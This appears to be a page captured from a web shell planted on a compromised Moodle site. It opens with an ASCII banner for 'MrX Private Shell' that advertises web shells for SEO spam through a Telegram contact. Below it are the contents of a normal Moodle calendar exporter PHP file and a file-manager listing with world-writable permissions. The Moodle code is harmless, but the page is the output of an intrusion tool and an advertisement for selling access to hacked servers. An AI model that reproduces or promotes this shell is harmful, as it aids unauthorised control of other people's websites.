__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <http://www.gnu.org/licenses/>.
/**
* Contains event class for displaying a calendar event's subscription.
*
* @package core_calendar
* @copyright 2017 Simey Lameze <simey@moodle.com>
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
namespace core_calendar\external;
defined('MOODLE_INTERNAL') || die();
use \core\external\exporter;
use \core_calendar\local\event\entities\event_interface;
/**
* Class for displaying a calendar event's subscription.
*
* @package core_calendar
* @copyright 2017 Simey Lameze <simey@moodle.com>
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
class event_subscription_exporter extends exporter {
/**
* Constructor.
*
* @param event_interface $event
*/
public function __construct(event_interface $event) {
global $CFG;
$data = new \stdClass();
$data->displayeventsource = false;
if ($event->get_subscription()) {
$subscription = calendar_get_subscription($event->get_subscription()->get('id'));
if (!empty($subscription) && $CFG->calendar_showicalsource) {
$data->displayeventsource = true;
if (!empty($subscription->url)) {
$data->subscriptionurl = $subscription->url;
}
$data->subscriptionname = $subscription->name;
}
}
parent::__construct($data);
}
/**
* Return the list of properties.
*
* @return array
*/
protected static function define_properties() {
return [
'displayeventsource' => [
'type' => PARAM_BOOL
],
'subscriptionname' => [
'type' => PARAM_RAW,
'optional' => true
],
'subscriptionurl' => [
'type' => PARAM_URL,
'optional' => true
],
];
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| export | Folder | 0777 |
|
|
| subscription | Folder | 0777 |
|
|
| calendar_day_exporter.php | File | 9.59 KB | 0777 |
|
| calendar_event_exporter.php | File | 15.23 KB | 0777 |
|
| calendar_upcoming_exporter.php | File | 6.09 KB | 0777 |
|
| date_exporter.php | File | 2.44 KB | 0777 |
|
| day_exporter.php | File | 8.43 KB | 0777 |
|
| day_name_exporter.php | File | 2.34 KB | 0777 |
|
| event_action_exporter.php | File | 3.86 KB | 0777 |
|
| event_exporter.php | File | 3.3 KB | 0777 |
|
| event_exporter_base.php | File | 15.11 KB | 0777 |
|
| event_icon_exporter.php | File | 5.6 KB | 0777 |
|
| event_subscription_exporter.php | File | 2.56 KB | 0777 |
|
| events_exporter.php | File | 3.6 KB | 0777 |
|
| events_grouped_by_course_exporter.php | File | 3.25 KB | 0777 |
|
| events_related_objects_cache.php | File | 8.86 KB | 0777 |
|
| events_same_course_exporter.php | File | 2.63 KB | 0777 |
|
| footer_options_exporter.php | File | 4.71 KB | 0777 |
|
| month_exporter.php | File | 15.52 KB | 0777 |
|
| week_day_exporter.php | File | 4.95 KB | 0777 |
|
| week_exporter.php | File | 5.88 KB | 0777 |
|